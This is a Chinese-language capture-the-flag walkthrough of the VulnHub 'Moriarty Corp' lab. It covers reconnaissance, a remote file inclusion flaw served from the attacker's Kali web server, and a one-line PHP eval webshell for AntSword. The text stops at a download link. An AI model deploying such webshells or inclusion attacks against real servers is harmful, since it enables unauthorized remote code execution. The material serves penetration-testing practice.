介绍
-
Vulnhub地址:BoredHacker博客: Moriarty Corp ~ VulnHub
-
发布日期: 29 Mar 2020
-
难度:中等
-
描述:
你好代理。
你来这里执行一项特殊任务。
一项任务是摧毁最大的武器供应商之一,即莫里亚蒂公司。
在网络应用程序中输入标志{开始}以开始使用!
笔记:
- Web 面板位于端口 8000 上(不在范围内。不要攻击)
- 标志以 #_flag.txt 格式存储。标志以标志{}格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
- 若要暂时停止播放,请暂停 VM。不要关闭它。
- 添加标志时,Web 应用会在后台启动 docker 容器。关闭并重新启动会搞砸它。
-
靶场环境:
机器 | ip |
---|---|
kali | 10.4.7.135 |
靶机 | 10.4.7.141:8000 |
信息收集
主机发现
arp-scan -l
端口扫描
namp -sV -O 10.4.7.141
网站探测
根据 Vulnhub 描述访问8000端口。
输入 flag{start}
开始。
根据提示,继续访问80端口。
在网站的连接中发现文件包含漏洞。
文件包含漏洞,通常分为本地文件包含和远程文件包含。本地文件包含,通常需要能够写入 webshell 的文件进行包含,进而获取 shell 权限。远程文件包含,可对远程写入 webshell 的文件进行包含,获取 shell 权限。
Web渗透
文件包含
在 kali 开启 Web 服务,靶机访问 php.php 文件进行包含,验证远程文件漏洞存在。
echo "<?php phpinfo(); ?>" > php.php
python3 -m http.server 80
上传一句话木马。
<?php eval($_POST['ant']; ?>
使用中国蚁剑连接。
下载地址: